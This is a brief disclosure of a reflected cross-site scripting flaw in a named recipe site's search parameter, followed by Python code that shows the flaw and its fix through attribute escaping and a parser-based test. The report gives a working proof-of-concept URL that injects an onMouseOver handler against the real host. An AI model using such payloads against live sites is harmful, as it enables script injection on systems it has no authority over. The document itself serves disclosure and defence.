The search bar on this page fails to encode double quotes (") in the reflected query parameter. A quote in the input therefore terminates the attribute it is placed in, so an onMouseOver event handler can be attached to the search box, allowing a reflected XSS attack to occur.
Code:
http://ideakeittio.fi.msn.com/ruokaohjehaku/?q=" onMouseOver=alert(/XSS/) "&mealtypes=suolaiset&mealtypes=leivonta-2&main_ingredient=1
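As an added illustration that is not code from the original report or from the affected site, the following Python snippet contrasts the broken attribute rendering the report describes with the fix: HTML-encoding the reflected parameter, quotes included, before placing it in the input's value attribute. The template markup, the function names and the constructed sample query are assumptions; the check parses the rendered tag with the standard library HTML parser and reports whether the attribute still holds the query as plain data.

```python
import html
from html.parser import HTMLParser

# Constructed sample: the same kind of value the report shows being reflected
# into the search box's value="..." attribute.
SAMPLE_QUERY = '" onMouseOver=alert(/XSS/) "'


def render_search_box_vulnerable(q: str) -> str:
    """Mimics the behaviour the report describes: the query parameter is
    interpolated into the attribute with no escaping, so a quote in it closes
    the value and whatever follows is parsed as new attributes."""
    return f'<input type="text" name="q" value="{q}">'


def render_search_box_fixed(q: str) -> str:
    """Hardened version: html.escape(..., quote=True) turns both double and
    single quotes (plus &, < and >) into character references, so the input
    can never break out of the attribute it is placed in."""
    return f'<input type="text" name="q" value="{html.escape(q, quote=True)}">'


class _InputAttrs(HTMLParser):
    """Collects the attribute dictionaries of every <input> tag seen."""

    def __init__(self) -> None:
        super().__init__()
        self.inputs: list[dict] = []

    def handle_starttag(self, tag: str, attrs: list) -> None:
        if tag == "input":
            # html.parser lowercases attribute names and decodes entities.
            self.inputs.append(dict(attrs))


def input_attributes(rendered: str) -> list[dict]:
    """Parse the rendered markup the way a browser roughly would and return
    the attribute dictionaries of the <input> elements found."""
    parser = _InputAttrs()
    parser.feed(rendered)
    parser.close()
    return parser.inputs


def is_safely_reflected(rendered: str, q: str) -> bool:
    """True when exactly one <input> is present, it carries only the three
    attributes the template intended, and its value decodes back to q.
    Any extra attribute (such as an event handler) means the attribute
    context was escaped and the reflection is unsafe."""
    inputs = input_attributes(rendered)
    if len(inputs) != 1:
        return False
    attrs = inputs[0]
    return set(attrs) == {"type", "name", "value"} and attrs.get("value") == q


if __name__ == "__main__":
    for label, render in (("vulnerable", render_search_box_vulnerable),
                          ("fixed", render_search_box_fixed)):
        out = render(SAMPLE_QUERY)
        print(f"{label}: {out}")
        print("  attributes:", input_attributes(out))
        print("  safe:", is_safely_reflected(out, SAMPLE_QUERY))
```

Running the script shows the vulnerable rendering gaining an `onmouseover` attribute the template never declared, while the fixed rendering keeps the whole query inside the value attribute as `&quot;`-encoded text that decodes back to the original string. The same check can be dropped into a unit test for any template that reflects user input into an attribute.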